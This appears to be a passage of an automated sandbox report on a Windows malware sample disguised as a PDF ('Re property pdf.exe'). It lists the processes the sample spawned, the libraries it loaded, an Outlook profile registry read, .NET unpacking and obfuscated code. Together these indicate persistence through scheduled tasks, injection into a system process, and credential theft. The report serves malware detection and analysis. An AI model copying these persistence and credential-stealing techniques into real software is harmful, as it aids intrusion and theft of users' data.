            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess created: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe"Jump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeProcess created: C:\Windows\SysWOW64\PresentationHost.exe "C:\Windows\SysWOW64\PresentationHost.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: iconcodecservice.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: iconcodecservice.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Re property pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Re property pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Re property pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: PresentationHost.pdbGCTL source: uGMCFMVqKoR.exe, 00000010.00000003.2118973099.0000000000A3B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uGMCFMVqKoR.exe, 00000010.00000002.4211703538.0000000000C2E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: Re property pdf.exe, 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Re property pdf.exe, Re property pdf.exe, 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: PresentationHost.pdb source: uGMCFMVqKoR.exe, 00000010.00000003.2118973099.0000000000A3B000.00000004.00000001.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, ntkhga1giMCKkUj49f.cs.Net Code: oJG6iAV4YZ System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, ntkhga1giMCKkUj49f.cs.Net Code: oJG6iAV4YZ System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, ntkhga1giMCKkUj49f.cs.Net Code: oJG6iAV4YZ System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0041423E push ebp; iretd 6_2_00414252
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00411820 push ebx; retf 0001h6_2_004118ED
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0041414E push 0000001Bh; ret 6_2_00414151
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00414129 push 0000001Bh; ret 6_2_00414151
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_004031F0 push eax; ret 6_2_004031F2
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00407202 push esp; iretd 6_2_00407203
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0041145C push edi; ret 6_2_004114BD
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0041146B push edi; ret 6_2_004114BD
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00415409 push cs; iretd 6_2_00415416
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_004085DF push edx; ret 6_2_004085E0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0042D5E3 push eax; ret 6_2_0042D685
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00414639 push cs; ret 6_2_0041463C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0040CFDC push eax; ret 6_2_0040CFDD
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00401F8B push es; ret 6_2_00401F8C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FD225F pushad ; ret 6_2_00FD27F9
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FD27FA pushad ; ret 6_2_00FD27F9
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010009AD push ecx; mov dword ptr [esp], ecx6_2_010009B6
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FD283D push eax; iretd 6_2_00FD2858
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FD1368 push eax; iretd 6_2_00FD1369
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0185C54D pushfd ; ret 12_2_0185C54E
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_018109AD push ecx; mov dword ptr [esp], ecx12_2_018109B6
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0185C9D7 push edi; ret 12_2_0185C9D9
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_017E1366 push eax; iretd 12_2_017E1369
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_017E1FEC push eax; iretd 12_2_017E1FED
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_01867E99 push ecx; ret 12_2_01867EAC
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0042D674 push eax; ret 12_2_0042D685
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeCode function: 12_2_0042D715 push D4ED8D44h; retf 12_2_0042D71A
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 16_2_0597BDE0 push cs; iretd 16_2_0597BDED
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 16_2_0596EE88 pushad ; retf 16_2_0596EE8B
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 16_2_05977E33 push edi; ret 16_2_05977E94
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeCode function: 16_2_05977E42 push edi; ret 16_2_05977E94
            Source: Re property pdf.exeStatic PE information: section name: .text entropy: 7.86751234729538
            Source: hwOHPmqcegxcxb.exe.0.drStatic PE information: section name: .text entropy: 7.86751234729538
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, PgmkSv6ErVfCPqNwCN.csHigh entropy of concatenated method names: 'LSuSfeWwPl', 'XfkS15tlcG', 'AHlS0olrPO', 'OeISnyrICT', 'C3wSX18A7d', 'mL8SpHdoRa', 'f9cCU5W3Oq3ABINF67', 'WPaxJeemeT8AfwJmcL', 'Bx8SSm2Fpe', 'iTuSbu0R4D'
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, lG0cDsVMiZvZHMNb00.csHigh entropy of concatenated method names: 'iKlkCQMMUY', 'eqJkWTD2cD', 'm8PkH1X7A1', 'fPLktxjILe', 'soKkJVBakm', 'jnQkfdIP3c', 'gu9k1oB9Mk', 'h3TkL7LYa1', 'wFTk0EWDep', 'UlGknPuPWo'
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, xf4RKpzpK525TBZTtR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wLa9qV6gmU', 'j6g9XtGI4O', 'Bpx9pY4lY4', 'Wx99U5BEIn', 'I8r9kwV6R8', 'q9v99GP6jI', 'IIn9BplqVL'
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, BGr2U7YHlolrPOaeIy.csHigh entropy of concatenated method names: 'oUjH7nFB5C', 'kFHH3ahlxw', 'G4iHZtAgBb', 'HhsHYenLtI', 'yn1HXorw2C', 'b1VHp6lLF5', 'kGPHUTpEVC', 'zeTHkhH47m', 'LO8H9w50Jl', 'nrgHB2PNHf'
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, kjuJGoMYe2T0JEnCE3.csHigh entropy of concatenated method names: 'NR2kld3CbT', 'nNJkF3NB68', 'IYmk4uHPW4', 'wHMkyKo5i4', 'EoOksJ2Lgt', 'dE9kgaqUvr', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, weWwPlZVfk5tlcGN3Y.csHigh entropy of concatenated method names: 'z62WsdIdTg', 'ztQW8mLuC9', 'hEZW2CZ9qi', 'a5xWrQghIj', 'w07WQMaxmy', 'troWetNnIr', 'Uh1WoWSsgb', 'OjcWVZeLli', 'unQWMVdkxl', 'vsBWP0tsT1'
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, DNn5p4soX0GKBuqmbh.csHigh entropy of concatenated method names: 'yB1XvHPE33', 'xP8XOm7D4J', 'LdPXsBW4Ap', 'vioX8KcRSX', 'LfIXFS2bvt', 'dxRX4dNNhn', 'Eu9XyylppH', 'EycXghuQEZ', 'GpDXmmuUAd', 'VghXdwXCHd'
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, hsM0fUPd5eRSTQBR3c.csHigh entropy of concatenated method names: 'dbJ9SpSwdD', 'HMq9boJXPk', 'H4V96RSsxR', 'sMc9CeMqyT', 'f0u9W3xJ9f', 'PJu9tfdr66', 'BM29JJtKGN', 'AZyko5xI2b', 'sULkVlSm2I', 'gZekMd4OLw'
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, mihGmtGUwHCyDp2toL.csHigh entropy of concatenated method names: 'ELkigeGFV', 'fa57J5ECm', 'VQb3x3WMw', 'KnnD6iJf4', 'SIfYTDwjV', 'wLpxlKGUI', 'g0YwebpJGVoQXK8Iwp', 'sZeBZ1vkGqKnTP6ZRi', 'jYek8mB0c', 'PT6BxqAD2'
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, gxCt1DjW5S79BIxSeC.csHigh entropy of concatenated method names: 'YLvqZ6eGjA', 'ICrqYBAAvc', 'f3kqlKiLhf', 'oklqFVLcsp', 'cSrqy6ZahJ', 'Fglqg2ZCW4', 'pZNqd6Q92W', 'wtKqKrjoWI', 'eRKqvHVd5C', 'HApqa99081'
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, puSGRTW1eEyAnuCnAo.csHigh entropy of concatenated method names: 'Dispose', 'Qg8SM58MQl', 'Na9GFBwDFC', 'luOuuPp3eq', 'k0GSP0cDsM', 'zZvSzZHMNb', 'ProcessDialogKey', 'l01GTjuJGo', 'Ee2GST0JEn', 'fE3GGHsM0f'
            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, FqaNDsAmeevbvb9cux.csHigh entropy of concatenated method names: 'DmFfIltv02', 'rBlf5o7XbH', 'O24fioCeBn', 'TIOf7lCbH4', 'kqZfE0cBMt', 'cuVf3ic3xX', 'GIxfDTnl8d', 'T2CfZI0P6Z', 'DiGfYLu9hy', 'n89fxZU0rR'
